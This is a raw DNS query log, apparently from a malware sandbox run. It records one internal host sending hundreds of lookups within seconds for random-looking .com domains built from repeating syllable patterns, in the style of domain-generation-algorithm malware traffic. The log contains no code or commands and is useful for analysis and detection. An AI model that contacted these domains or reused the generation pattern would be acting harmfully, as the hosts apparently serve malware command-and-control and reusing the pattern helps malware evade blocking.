                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646362066 CEST192.168.2.91.1.1.10x2532Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646573067 CEST192.168.2.91.1.1.10xad6Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646754980 CEST192.168.2.91.1.1.10x452cStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.649508953 CEST192.168.2.91.1.1.10x7ab5Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.660341024 CEST192.168.2.91.1.1.10x84d5Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.666996956 CEST192.168.2.91.1.1.10x17abStandard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.669034004 CEST192.168.2.91.1.1.10xf6f1Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.672666073 CEST192.168.2.91.1.1.10xa731Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.674298048 CEST192.168.2.91.1.1.10x5ef8Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.674468994 CEST192.168.2.91.1.1.10x7a2fStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.814471006 CEST192.168.2.91.1.1.10x24bbStandard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.814513922 CEST192.168.2.91.1.1.10x90c8Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.814786911 CEST192.168.2.91.1.1.10x144cStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.815206051 CEST192.168.2.91.1.1.10xcf6cStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.815423965 CEST192.168.2.91.1.1.10x7203Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.817889929 CEST192.168.2.91.1.1.10x5dbbStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818267107 CEST192.168.2.91.1.1.10xd997Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818289042 CEST192.168.2.91.1.1.10x38e2Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818480015 CEST192.168.2.91.1.1.10x62edStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818978071 CEST192.168.2.91.1.1.10x8844Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.820452929 CEST192.168.2.91.1.1.10x8d7eStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.820611954 CEST192.168.2.91.1.1.10x228bStandard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.820799112 CEST192.168.2.91.1.1.10x63d2Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821549892 CEST192.168.2.91.1.1.10x8a80Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821567059 CEST192.168.2.91.1.1.10x7b1eStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821765900 CEST192.168.2.91.1.1.10x1130Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821933031 CEST192.168.2.91.1.1.10x5922Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.822169065 CEST192.168.2.91.1.1.10x7235Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.822735071 CEST192.168.2.91.1.1.10xf958Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.213248968 CEST192.168.2.91.1.1.10x341fStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.216339111 CEST192.168.2.91.1.1.10x8887Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.217235088 CEST192.168.2.91.1.1.10x7d4eStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.217927933 CEST192.168.2.91.1.1.10xaf86Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.223345041 CEST192.168.2.91.1.1.10xa2aeStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.224988937 CEST192.168.2.91.1.1.10xbbc7Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.225389004 CEST192.168.2.91.1.1.10x94a5Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226223946 CEST192.168.2.91.1.1.10xae41Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226686001 CEST192.168.2.91.1.1.10x90bdStandard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226969004 CEST192.168.2.91.1.1.10x79ccStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.228765965 CEST192.168.2.91.1.1.10x196dStandard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.229898930 CEST192.168.2.91.1.1.10x707eStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.230392933 CEST192.168.2.91.1.1.10xb8a9Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.234704971 CEST192.168.2.91.1.1.10x6fcStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.240641117 CEST192.168.2.91.1.1.10x1ca6Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.241128922 CEST192.168.2.91.1.1.10x627bStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.241543055 CEST192.168.2.91.1.1.10xbcd7Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.245776892 CEST192.168.2.91.1.1.10xf91fStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.258322954 CEST192.168.2.91.1.1.10xfa14Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261043072 CEST192.168.2.91.1.1.10xf6Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265492916 CEST192.168.2.91.1.1.10xaca3Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265659094 CEST192.168.2.91.1.1.10x6eb0Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265799046 CEST192.168.2.91.1.1.10x4566Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265959024 CEST192.168.2.91.1.1.10x5c06Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.266190052 CEST192.168.2.91.1.1.10x27ccStandard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.283938885 CEST192.168.2.91.1.1.10xa1e9Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.284141064 CEST192.168.2.91.1.1.10x7616Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291008949 CEST192.168.2.91.1.1.10x6684Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291181087 CEST192.168.2.91.1.1.10xa565Standard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291340113 CEST192.168.2.91.1.1.10x51abStandard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291490078 CEST192.168.2.91.1.1.10xd1a6Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291626930 CEST192.168.2.91.1.1.10x68eaStandard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291770935 CEST192.168.2.91.1.1.10x5011Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292093992 CEST192.168.2.91.1.1.10x5643Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292270899 CEST192.168.2.91.1.1.10x490dStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292371988 CEST192.168.2.91.1.1.10x30d1Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.294317961 CEST192.168.2.91.1.1.10x2a82Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.296051979 CEST192.168.2.91.1.1.10x861Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.297738075 CEST192.168.2.91.1.1.10xcd6dStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.298588037 CEST192.168.2.91.1.1.10xd8dbStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.299463987 CEST192.168.2.91.1.1.10x63a2Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301577091 CEST192.168.2.91.1.1.10xab7dStandard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301953077 CEST192.168.2.91.1.1.10xc985Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.304023981 CEST192.168.2.91.1.1.10x8456Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316416979 CEST192.168.2.91.1.1.10x6cc5Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316576004 CEST192.168.2.91.1.1.10xf966Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316736937 CEST192.168.2.91.1.1.10xc9d3Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316920042 CEST192.168.2.91.1.1.10x52b5Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317055941 CEST192.168.2.91.1.1.10x31d3Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317481041 CEST192.168.2.91.1.1.10x979bStandard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317969084 CEST192.168.2.91.1.1.10xa7e9Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.318121910 CEST192.168.2.91.1.1.10x3e5eStandard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.320467949 CEST192.168.2.91.1.1.10x4285Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.320738077 CEST192.168.2.91.1.1.10x3bb8Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321229935 CEST192.168.2.91.1.1.10xe9caStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321238995 CEST192.168.2.91.1.1.10xaa28Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321429968 CEST192.168.2.91.1.1.10x81c3Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321448088 CEST192.168.2.91.1.1.10x980fStandard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321599007 CEST192.168.2.91.1.1.10x9f63Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.322855949 CEST192.168.2.91.1.1.10x182Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.323532104 CEST192.168.2.91.1.1.10x3104Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.445605993 CEST192.168.2.91.1.1.10xeb1eStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.614526987 CEST192.168.2.91.1.1.10x26eeStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.083877087 CEST192.168.2.91.1.1.10x8c11Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.199573040 CEST192.168.2.91.1.1.10xd5bcStandard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.201853991 CEST192.168.2.91.1.1.10x26e0Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.203505993 CEST192.168.2.91.1.1.10x4d3Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.211554050 CEST192.168.2.91.1.1.10x7ae7Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.212462902 CEST192.168.2.91.1.1.10x2f4Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.213002920 CEST192.168.2.91.1.1.10x7d01Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.224522114 CEST192.168.2.91.1.1.10xb554Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.226394892 CEST192.168.2.91.1.1.10x7917Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.226432085 CEST192.168.2.91.1.1.10x2557Standard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.228625059 CEST192.168.2.91.1.1.10xdf78Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.228750944 CEST192.168.2.91.1.1.10xebf1Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.230705976 CEST192.168.2.91.1.1.10xc6f4Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.231332064 CEST192.168.2.91.1.1.10x1ccdStandard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.234410048 CEST192.168.2.91.1.1.10xb0a3Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236035109 CEST192.168.2.91.1.1.10x38c9Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236541033 CEST192.168.2.91.1.1.10x6045Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236736059 CEST192.168.2.91.1.1.10x8fe7Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236929893 CEST192.168.2.91.1.1.10x21dbStandard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.241780996 CEST192.168.2.91.1.1.10xa5a1Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.242149115 CEST192.168.2.91.1.1.10x73d1Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.246548891 CEST192.168.2.91.1.1.10x2ee0Standard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.246850967 CEST192.168.2.91.1.1.10xeba7Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.247025967 CEST192.168.2.91.1.1.10x25beStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.248636007 CEST192.168.2.91.1.1.10xb32bStandard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.250150919 CEST192.168.2.91.1.1.10xb332Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.254029989 CEST192.168.2.91.1.1.10x27baStandard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.254220963 CEST192.168.2.91.1.1.10xc48eStandard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.256809950 CEST192.168.2.91.1.1.10xc5feStandard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.264163971 CEST192.168.2.91.1.1.10x38fbStandard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.274950981 CEST192.168.2.91.1.1.10x6ecfStandard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.276391983 CEST192.168.2.91.1.1.10x8897Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.292284012 CEST192.168.2.91.1.1.10xa4cStandard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.298433065 CEST192.168.2.91.1.1.10xa45cStandard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.298607111 CEST192.168.2.91.1.1.10x3d59Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.299047947 CEST192.168.2.91.1.1.10x9988Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310601950 CEST192.168.2.91.1.1.10x4350Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310657024 CEST192.168.2.91.1.1.10xb9daStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310808897 CEST192.168.2.91.1.1.10xd6b8Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310931921 CEST192.168.2.91.1.1.10x87cfStandard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359214067 CEST192.168.2.91.1.1.10x8374Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359349966 CEST192.168.2.91.1.1.10x3ca3Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359673023 CEST192.168.2.91.1.1.10xf5d0Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361310005 CEST192.168.2.91.1.1.10xe05eStandard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361454010 CEST192.168.2.91.1.1.10xf604Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361732960 CEST192.168.2.91.1.1.10x64efStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361749887 CEST192.168.2.91.1.1.10x6b39Standard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458461046 CEST192.168.2.91.1.1.10x2e77Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458724976 CEST192.168.2.91.1.1.10xe4baStandard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458966970 CEST192.168.2.91.1.1.10x8957Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458990097 CEST192.168.2.91.1.1.10xa1b9Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459230900 CEST192.168.2.91.1.1.10x30beStandard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459539890 CEST192.168.2.91.1.1.10x6cbStandard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459553003 CEST192.168.2.91.1.1.10x6fbdStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459834099 CEST192.168.2.91.1.1.10xd9eStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459867954 CEST192.168.2.91.1.1.10xd77aStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460258007 CEST192.168.2.91.1.1.10xc155Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460319996 CEST192.168.2.91.1.1.10xfef3Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460566998 CEST192.168.2.91.1.1.10x17dbStandard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.461606026 CEST192.168.2.91.1.1.10x6b40Standard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.462905884 CEST192.168.2.91.1.1.10x9c45Standard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.463100910 CEST192.168.2.91.1.1.10x3f2Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.463288069 CEST192.168.2.91.1.1.10xe526Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.466025114 CEST192.168.2.91.1.1.10x567Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.472610950 CEST192.168.2.91.1.1.10xb380Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.890337944 CEST192.168.2.91.1.1.10xe829Standard query (0)puvyxig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.891731977 CEST192.168.2.91.1.1.10x32e5Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.892016888 CEST192.168.2.91.1.1.10xb921Standard query (0)gahyqas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.902776957 CEST192.168.2.91.1.1.10x6fb8Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.912209034 CEST192.168.2.91.1.1.10xad39Standard query (0)lyvyxin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.913156033 CEST192.168.2.91.1.1.10x5eeStandard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.913569927 CEST192.168.2.91.1.1.10x3edfStandard query (0)gacyryb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.920531988 CEST192.168.2.91.1.1.10x8517Standard query (0)lygymod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921243906 CEST192.168.2.91.1.1.10x191bStandard query (0)qeqysap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921467066 CEST192.168.2.91.1.1.10x56aeStandard query (0)lyvytud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921684027 CEST192.168.2.91.1.1.10xb24cStandard query (0)puvytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.922410011 CEST192.168.2.91.1.1.10x6745Standard query (0)qetyveq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.924055099 CEST192.168.2.91.1.1.10x5e55Standard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.925297976 CEST192.168.2.91.1.1.10xebb3Standard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.926645041 CEST192.168.2.91.1.1.10x308dStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.928010941 CEST192.168.2.91.1.1.10x6e76Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.942358971 CEST192.168.2.91.1.1.10xa9dbStandard query (0)qekykal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.942646027 CEST192.168.2.91.1.1.10x5e45Standard query (0)qegyqov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.943227053 CEST192.168.2.91.1.1.10xe3cdStandard query (0)gadynub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.943736076 CEST192.168.2.91.1.1.10x3757Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.943952084 CEST192.168.2.91.1.1.10x4be6Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.962413073 CEST192.168.2.91.1.1.10xc3eeStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964286089 CEST192.168.2.91.1.1.10x2ec9Standard query (0)lygygux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964497089 CEST192.168.2.91.1.1.10x246fStandard query (0)vofymif.comA (IP address)IN (0x0001)false
